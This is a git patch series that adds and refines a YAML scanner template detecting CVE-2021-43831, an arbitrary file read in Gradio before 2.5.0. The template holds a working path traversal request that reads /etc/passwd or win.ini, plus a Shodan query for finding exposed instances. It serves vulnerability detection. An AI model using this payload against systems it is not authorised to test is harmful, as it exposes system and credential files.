From 7c5a294b9b89e224bdae03639c163d7f1a019e37 Mon Sep 17 00:00:00 2001
From: isacaya <114328108+isacaya@users.noreply.github.com>
Date: Sat, 15 Jun 2024 21:43:59 +0900
Subject: [PATCH 1/4] Create CVE-2021-43831.yaml

---
 http/cves/2021/CVE-2021-43831.yaml | 52 ++++++++++++++++++++++++++++++
 1 file changed, 52 insertions(+)
 create mode 100644 http/cves/2021/CVE-2021-43831.yaml

diff --git a/http/cves/2021/CVE-2021-43831.yaml b/http/cves/2021/CVE-2021-43831.yaml
new file mode 100644
index 0000000000..85711779f2
--- /dev/null
+++ b/http/cves/2021/CVE-2021-43831.yaml
@@ -0,0 +1,52 @@
+id: CVE-2021-43831
+
+info:
+  name: Arbitrary File Read in Gradio
+  author: isacaya
+  severity: high
+  description: |
+    Files on the host computer can be accessed from the Gradio interface
+  impact: |
+    An attacker would be able to view the contents of a file on the computer.
+  remediation: |
+    Update to version 2.5.0.
+  reference:
+    - https://github.com/gradio-app/gradio/security/advisories/GHSA-rhq2-3vr9-6mcr
+    - https://github.com/gradio-app/gradio/commit/41bd3645bdb616e1248b2167ca83636a2653f781
+  classification:
+    cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L
+    cvss-score: 8.3
+    cve-id: CVE-2021-43831
+    cpe: cpe:2.3:a:gradio_project:gradio:*:*:*:*:*:python:*:*
+  metadata:
+    vendor: Gradio
+    product: Gradio
+    shodan-query: title:"Gradio"
+  tags: cve,cve2021,lfi,Gradio,traversal
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/file/../../../../../../../../../../../../../../../../../..{{path}}"
+
+    payloads:
+      path:
+        - /etc/passwd
+        - /windows/win.ini
+
+    stop-at-first-match: true
+    matchers-condition: or
+    matchers:
+      - type: dsl
+        dsl:
+          - "regex('root:.*:0:0:', body)"
+          - "status_code == 200"
+        condition: and
+
+      - type: dsl
+        dsl:
+          - "contains(body, 'bit app support')"
+          - "contains(body, 'fonts')"
+          - "contains(body, 'extensions')"
+          - "status_code == 200"
+        condition: and
\ No newline at end of file

From f35d7dccc83c24ae898d91bd1d3a20bb1e471714 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Sun, 16 Jun 2024 05:52:46 +0530
Subject: [PATCH 2/4] minor update

---
 http/cves/2021/CVE-2021-43831.yaml | 36 +++++++++++++++---------------
 1 file changed, 18 insertions(+), 18 deletions(-)

diff --git a/http/cves/2021/CVE-2021-43831.yaml b/http/cves/2021/CVE-2021-43831.yaml
index 85711779f2..d231cceb03 100644
--- a/http/cves/2021/CVE-2021-43831.yaml
+++ b/http/cves/2021/CVE-2021-43831.yaml
@@ -14,15 +14,19 @@ info:
     - https://github.com/gradio-app/gradio/security/advisories/GHSA-rhq2-3vr9-6mcr
     - https://github.com/gradio-app/gradio/commit/41bd3645bdb616e1248b2167ca83636a2653f781
   classification:
-    cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L
-    cvss-score: 8.3
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
+    cvss-score: 7.7
     cve-id: CVE-2021-43831
+    cwe-id: CWE-22
+    epss-score: 0.00063
+    epss-percentile: 0.26511
     cpe: cpe:2.3:a:gradio_project:gradio:*:*:*:*:*:python:*:*
   metadata:
-    vendor: Gradio
-    product: Gradio
+    vendor: gradio_project
+    product: gradio
+    framework: python
     shodan-query: title:"Gradio"
-  tags: cve,cve2021,lfi,Gradio,traversal
+  tags: cve,cve2021,lfi,gradio
 
 http:
   - method: GET
@@ -35,18 +39,14 @@ http:
         - /windows/win.ini
 
     stop-at-first-match: true
-    matchers-condition: or
+    matchers-condition: and
     matchers:
-      - type: dsl
-        dsl:
-          - "regex('root:.*:0:0:', body)"
-          - "status_code == 200"
-        condition: and
+      - type: regex
+        regex:
+          - "root:.*:0:0:"
+          - "\\[(font|extension|file)s\\]"
+        condition: or
 
-      - type: dsl
-        dsl:
-          - "contains(body, 'bit app support')"
-          - "contains(body, 'fonts')"
-          - "contains(body, 'extensions')"
-          - "status_code == 200"
-        condition: and
\ No newline at end of file
+      - type: status
+        status:
+          - 200

From d4672990c24e86983e145512117868720c6616dd Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Sun, 16 Jun 2024 16:56:15 +0530
Subject: [PATCH 3/4] Update CVE-2021-43831.yaml

---
 http/cves/2021/CVE-2021-43831.yaml | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/http/cves/2021/CVE-2021-43831.yaml b/http/cves/2021/CVE-2021-43831.yaml
index d231cceb03..6499d743b8 100644
--- a/http/cves/2021/CVE-2021-43831.yaml
+++ b/http/cves/2021/CVE-2021-43831.yaml
@@ -1,7 +1,7 @@
 id: CVE-2021-43831
 
 info:
-  name: Arbitrary File Read in Gradio
+  name: Gradio < 2.5.0 - Arbitrary File Read 
   author: isacaya
   severity: high
   description: |
@@ -39,6 +39,7 @@ http:
         - /windows/win.ini
 
     stop-at-first-match: true
+
     matchers-condition: and
     matchers:
       - type: regex

From 0d6a44c3cb8e3e062de310b82e5138eec5685aed Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Sun, 16 Jun 2024 16:59:19 +0530
Subject: [PATCH 4/4] lint fix

---
 http/cves/2021/CVE-2021-43831.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/http/cves/2021/CVE-2021-43831.yaml b/http/cves/2021/CVE-2021-43831.yaml
index 6499d743b8..41bdceadc2 100644
--- a/http/cves/2021/CVE-2021-43831.yaml
+++ b/http/cves/2021/CVE-2021-43831.yaml
@@ -1,7 +1,7 @@
 id: CVE-2021-43831
 
 info:
-  name: Gradio < 2.5.0 - Arbitrary File Read 
+  name: Gradio < 2.5.0 - Arbitrary File Read
   author: isacaya
   severity: high
   description: |